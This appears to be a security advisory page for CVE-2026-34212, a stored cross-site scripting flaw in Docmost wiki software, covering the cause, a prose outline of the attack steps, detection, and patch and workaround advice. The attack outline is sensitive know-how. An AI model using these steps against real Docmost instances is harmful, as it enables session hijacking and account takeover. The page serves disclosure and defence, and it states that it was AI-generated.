CVE-2026-34212 Overview
CVE-2026-34212 is a stored Cross-Site Scripting (XSS) vulnerability in Docmost, an open-source collaborative wiki and documentation software. The vulnerability exists due to improper neutralization of attachment URLs, allowing a low-privileged authenticated user to store a malicious javascript: URL inside an attachment node in page content. When another user views the page and activates the attachment link or icon, attacker-controlled JavaScript executes in the context of the Docmost origin.
Critical Impact
Authenticated attackers can inject malicious JavaScript that executes in the browsers of other users viewing affected pages, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of victims.
Affected Products
- Docmost versions prior to 0.71.0
Discovery Timeline
- 2026-04-14 - CVE CVE-2026-34212 published to NVD
- 2026-04-14 - Last updated in NVD database
Technical Details for CVE-2026-34212
Vulnerability Analysis
This vulnerability is classified as CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting). The flaw stems from insufficient validation and sanitization of user-supplied URLs within attachment nodes in Docmost's page content system. When a low-privileged authenticated user creates or edits page content, they can embed attachment references with arbitrary URL schemes, including the javascript: protocol.
The attack requires user interaction—specifically, another user must click on the malicious attachment link or icon. Once triggered, the injected JavaScript executes within the security context of the Docmost application origin, granting the attacker access to session tokens, cookies, and the ability to perform actions as the victim user.
Root Cause
The root cause is the lack of proper URL scheme validation when processing attachment URLs. Docmost fails to enforce an allowlist of safe URL protocols (such as http:, https:, or relative paths) when storing and rendering attachment nodes. This oversight allows arbitrary protocol handlers, including javascript:, to be embedded directly into page content.
Attack Vector
The attack is network-based and requires low privileges (any authenticated user can exploit it) combined with user interaction from the victim. An attacker would:
- Authenticate to the Docmost instance with any valid user account
- Create or edit a page and insert an attachment node
- Set the attachment URL to a javascript: URI containing malicious code
- Wait for another user (potentially with higher privileges) to view the page and click the attachment
The malicious JavaScript then executes in the victim's browser session, potentially allowing the attacker to steal session cookies, perform actions as the victim, or redirect users to phishing pages.
Detection Methods for CVE-2026-34212
Indicators of Compromise
- Page content containing attachment nodes with javascript: URL schemes
- Unexpected JavaScript execution when users interact with attachment links
- User reports of unusual behavior after clicking attachments in wiki pages
- Audit logs showing attachment URL modifications containing script payloads
Detection Strategies
- Implement content security policies (CSP) that restrict inline script execution
- Monitor page content for suspicious URL patterns, particularly javascript: protocol handlers
- Review audit logs for page edits that introduce attachment nodes with non-standard URL schemes
- Deploy web application firewalls (WAF) with rules to detect XSS payloads in stored content
Monitoring Recommendations
- Enable verbose logging for page content modifications and attachment changes
- Set up alerts for CSP violation reports that may indicate XSS exploitation attempts
- Regularly audit stored page content for potentially malicious URL patterns
- Monitor for unusual session activity that could indicate session hijacking
How to Mitigate CVE-2026-34212
Immediate Actions Required
- Upgrade Docmost to version 0.71.0 or later immediately
- Audit existing page content for attachment nodes containing javascript: URLs
- Review user activity logs for signs of exploitation
- Consider temporarily restricting attachment creation privileges until patched
Patch Information
Docmost version 0.71.0 addresses this vulnerability by implementing proper URL scheme validation for attachment nodes. Organizations should upgrade to this version or later as soon as possible. For more details, refer to the GitHub Security Advisory.
Workarounds
- Implement a strict Content Security Policy (CSP) header that blocks inline scripts and javascript: URIs
- Use a web application firewall to filter requests containing javascript: protocol handlers
- Restrict page editing permissions to trusted users only until the patch is applied
- Manually review and sanitize existing page content for suspicious attachment URLs
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
